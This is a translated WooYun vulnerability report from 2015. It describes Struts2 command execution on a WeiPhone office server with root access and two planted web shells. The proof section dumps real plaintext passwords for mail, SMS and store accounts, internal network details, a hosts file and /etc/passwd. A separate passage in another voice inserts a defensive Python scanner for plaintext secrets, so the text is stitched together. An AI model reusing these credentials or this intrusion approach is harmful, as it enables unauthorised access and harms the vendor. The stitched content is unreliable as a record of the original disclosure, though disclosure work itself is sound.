
Vulnerability summary

Defect ID: wooyun-2015-0113254

Vulnerability title: A 威锋网 (WeiPhone) site is misconfigured and can be shelled, leading to leakage of large amounts of sensitive data

Related vendor: weiphone

Vulnerability author: 炊烟

Submitted: 2015-05-10 16:33

Fixed: 2015-06-25 10:22

Published: 2015-06-25 10:22

Vulnerability type: Command execution

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-05-10: Details sent to the vendor, awaiting vendor handling
2015-05-11: Vendor has confirmed; details disclosed to the vendor only
2015-05-21: Details disclosed to core white hats and experts in related fields
2015-05-31: Details disclosed to regular white hats
2015-06-10: Details disclosed to intern white hats
2015-06-25: Details disclosed to the public

Brief description:

I had originally intended to go deeper..

Detailed description:

Bound domain name

http://office.feng.com:8099/

Struts2 command execution: http://113.108.53.7:8099/system/systemLogonAction.do
root privileges, got a shell directly

root password
Proof of vulnerability:

Shell addresses:

masked area
1.http://**.**.**/for.jsp_
2.http://**.**.**/js/js.jsp

I broke the site.. delete it yourselves
info

[/usr/local/software/tomcat/webapps/ROOT/]$ id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh
[/usr/local/software/tomcat/webapps/ROOT/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:9A:D3:6A
inet addr:192.168.9.21 Bcast:192.168.9.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:fe9a:d36a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:222501567 errors:0 dropped:0 overruns:0 frame:0
TX packets:85925803 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:37493228829 (34.9 GiB) TX bytes:29491862734 (27.4 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:177914494 errors:0 dropped:0 overruns:0 frame:0
TX packets:177914494 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:45454712043 (42.3 GiB) TX bytes:45454712043 (42.3 GiB)
<magento>
<userName>user123</userName>
<password>123456</password>
</magento>

<sms_webservice>
<sn>SDK-ADC-010-00020</sn>
<password>175721</password>
<serviceURL>http://117.79.237.3:8060/webservice.asmx</serviceURL>
</sms_webservice>

<emailConfig>
<smtpHost>mail.weiphone.com</smtpHost>
<emailFrom>仓库系统</emailFrom>
<emailTo>lwklwk1986@126.com</emailTo>
<userName>fengbuy@weiphone.com</userName>
<password>FengBuyadmin2013</password>
<subject>威锋网订单提示</subject>
</emailConfig>

<order_auto>
<order_interval>20</order_interval>
</order_auto>
<expressConfig>
<senderName>威锋网</senderName>
<magentoSenderName>威锋商城</magentoSenderName>
<senderAccountNo>275925233</senderAccountNo>
<senderSFAccountNo>7553356949</senderSFAccountNo>
<senderSFAccountNoNew>7552059551</senderSFAccountNoNew>
<senderFEDEXAccountNo>7 5 5 3 1 3 5 6 2 9</senderFEDEXAccountNo>
<phone>0755-26857667</phone>
<servicePhone>4006078090</servicePhone>
<region>广东省</region>
<city>深圳市</city>
<district>南山区</district>
<address_id>440305</address_id>
<address>深圳市南山区南海大道1057号科技二期B座403</address>
<postCode>518067</postCode>
</expressConfig>
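The configuration dump above is the sensitive data the title refers to: service accounts, an SMTP login and an SMS gateway credential all sit as literal values in an XML file readable by the web application's user. As an added example (my own code, not from the report or the vendor), the script below walks an XML config and flags secret-bearing elements that hold a literal value instead of a reference to an environment variable; the sample config is constructed to mirror the structure of the leaked file, every value in it is a placeholder, and the tag list and the `${VAR}` placeholder convention are assumptions.

```python
"""Flag plaintext credentials in application XML config files.

Added example, not part of the original WooYun report. The sample config is
constructed to mirror the leaked file's layout (magento, sms_webservice,
emailConfig blocks); all values are placeholders.
"""
import re
import xml.etree.ElementTree as ET

# Element names that commonly carry secrets (assumed list; extend as needed).
SECRET_TAGS = {"password", "passwd", "pwd", "secret", "token", "apikey", "api_key"}

# Constructed sample config. The emailConfig password shows the pattern we
# want to see: a reference resolved at runtime, not a literal.
SAMPLE_CONFIG = """<config>
  <magento>
    <userName>user123</userName>
    <password>PLACEHOLDER_PASSWORD</password>
  </magento>
  <sms_webservice>
    <sn>PLACEHOLDER-SN</sn>
    <password>PLACEHOLDER</password>
    <serviceURL>http://sms.example.invalid/webservice.asmx</serviceURL>
  </sms_webservice>
  <emailConfig>
    <smtpHost>mail.example.invalid</smtpHost>
    <userName>orders@example.invalid</userName>
    <password>${MAIL_PASSWORD}</password>
  </emailConfig>
</config>"""


def is_placeholder(value):
    """True when the value is a ${VAR} reference rather than a literal secret."""
    return bool(re.fullmatch(r"\$\{[A-Za-z_][A-Za-z0-9_]*\}", value.strip()))


def mask(value):
    """Keep only the first two characters so a report never re-leaks the secret."""
    return value[:2] + "***"


def find_plaintext_secrets(xml_text):
    """Return a list of (element path, masked value) for literal secrets."""
    root = ET.fromstring(xml_text)
    findings = []

    def walk(elem, path):
        here = f"{path}/{elem.tag}"
        if elem.tag.lower() in SECRET_TAGS:
            value = (elem.text or "").strip()
            if value and not is_placeholder(value):
                findings.append((here, mask(value)))
        for child in elem:
            walk(child, here)

    walk(root, "")
    return findings


if __name__ == "__main__":
    for path, preview in find_plaintext_secrets(SAMPLE_CONFIG):
        print(f"plaintext secret at {path}: {preview}")
```

Run it against real config trees before deployment (and from a file-integrity or CI check afterwards); every hit is a value that should move to an environment variable or secrets store, after which the file can stay readable by the application without becoming a credential dump the moment the host is compromised.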


Partial DNS information

h.root-servers.net. 277875 IN A 128.63.2.53
e.root-servers.net. 277875 IN A 192.203.230.10
a.root-servers.net. 277875 IN A 198.41.0.4
c.root-servers.net. 277875 IN A 192.33.4.12
d.root-servers.net. 277875 IN A 199.7.91.13
g.root-servers.net. 277875 IN A 192.112.36.4
f.root-servers.net. 277875 IN A 192.5.5.241
b.root-servers.net. 277875 IN A 192.228.79.201
e.root-servers.net. 277875 IN A 192.203.230.10
a.root-servers.net. 277875 IN A 198.41.0.4
c.root-servers.net. 277875 IN A 192.33.4.12
d.root-servers.net. 277875 IN A 199.7.91.13
g.root-servers.net. 277875 IN A 192.112.36.4
f.root-servers.net. 277875 IN A 192.5.5.241
b.root-servers.net. 277875 IN A 192.228.79.201
h.root-servers.net. 277875 IN A 128.63.2.53
a.root-servers.net. 277799 IN A 198.41.0.4
c.root-servers.net. 277799 IN A 192.33.4.12
d.root-servers.net. 277799 IN A 199.7.91.13
g.root-servers.net. 277799 IN A 192.112.36.4
f.root-servers.net. 277799 IN A 192.5.5.241
b.root-servers.net. 277799 IN A 192.228.79.201
h.root-servers.net. 277799 IN A 128.63.2.53
e.root-servers.net. 277799 IN A 192.203.230.10


Partial information from 192.168.9.30

#127.0.0.1	localhost center.wefiler.com
127.0.1.1 dev-30.staff.weiphone.com dev-30
127.0.0.1 mx.phone.com localhost devapp.joyslink.com
192.168.9.30 devapp.joyslink.com localhost
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
jeff:x:1000:1000:jeff,,,:/home/jeff:/bin/bash
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
memcache:x:107:114:Memcached,,,:/nonexistent:/bin/false
Debian-exim:x:108:115::/var/spool/exim4:/bin/false
amavis:x:109:116:AMaViS system user,,,:/var/lib/amavis:/bin/sh
cluebringer:x:110:117::/etc/cluebringer:/usr/sbin/nologin
postfix:x:111:119::/var/spool/postfix:/bin/false
clamav:x:112:121::/var/lib/clamav:/bin/false
dovecot:x:113:122:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:114:65534:Dovecot login user,,,:/nonexistent:/bin/false
vmail:x:2000:2000::/var/vmail:/sbin/nologin
iredadmin:x:2001:2001::/home/iredadmin:/sbin/nologin
iredapd:x:2002:2002::/home/iredapd:/sbin/nologin
zabbix:x:2003:2003::/home/zabbix:/bin/sh

Remediation:

If the site is not in use, just shut it down; otherwise block access from the external network.

Copyright notice: when reposting, credit the source: 炊烟@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-05-11 10:20

Vendor reply:

Thanks for the heads-up, fixing it now

Latest status:

None yet